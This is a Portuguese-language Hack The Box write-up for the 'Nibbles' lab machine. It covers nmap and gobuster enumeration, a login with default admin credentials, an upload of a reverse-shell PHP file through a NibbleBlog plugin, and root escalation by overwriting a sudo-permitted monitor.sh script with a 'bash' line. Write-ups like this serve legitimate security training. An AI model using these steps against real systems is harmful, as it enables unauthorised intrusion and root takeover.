Nibbles - HTB Write Up - NibbleBlog Exploit

NibbleBlog Exploit

Enumeração

NMAP Geral

nmap -Pn -sV [IP]

NMAP Específico

HTTP Scan

nmap -Pn -p 80 -A [IP]

nmap -Pn -T4 -p 80 --script="http-*" [IP]

Resultado do scan no HTTP mostra um comentário no código para o diretório /nibbleblog/

SSH Scan

nmap -Pn -p 22 -A [IP] 

nmap -Pn -T4 -p 22 --script="ssh-*" [IP]

Enumeração de diretórios 

dirb [URL]

gobuster dir -e -w directory-list-2.3-medium.txt -u http://[IP]

gobuster dir -e -w directory-list-2.3-medium.txt -u http://[IP]/nibbleblog/ -x php

O resultado da enumeração de diretórios mostra a página admin.php e outras. 

O login para acesso encontrei ao buscar no google: usuário admin e senha nibbles

Ao pesquisar por vulnerabilidade para Nibbles encontrei o exploit no Packet Storm AQUI Seguindo a descrição do exploit, acessei o pluguin My Image, fiz o upload do script em PHP da shell reversa disponível AQUI e a conexão foi estabelecida. 

Ao acessar o diretório home do usuário nibbler, encontrei um arquivo ZIP e ao descompactar o arquivo encontrei o script monitor.sh 

De acordo com o resultado do comando sudo -l o script é executado com privilégio root Logo todos os comandos executados pelo script são executados com permissão de root. 

Fiz uma cópia do script original e criei um arquivo novo com o mesmo nome monitor.sh Nesse novo script adicionei o comando "bash"

echo "#!/bin/sh" >> monitor.sh

echo "bash" >> monitor.sh

Adicionei permissão de execução ao script 

chmod +x monitor.sh

Executei o script usando o sudo e a shell com privilégio de root foi estabelecida.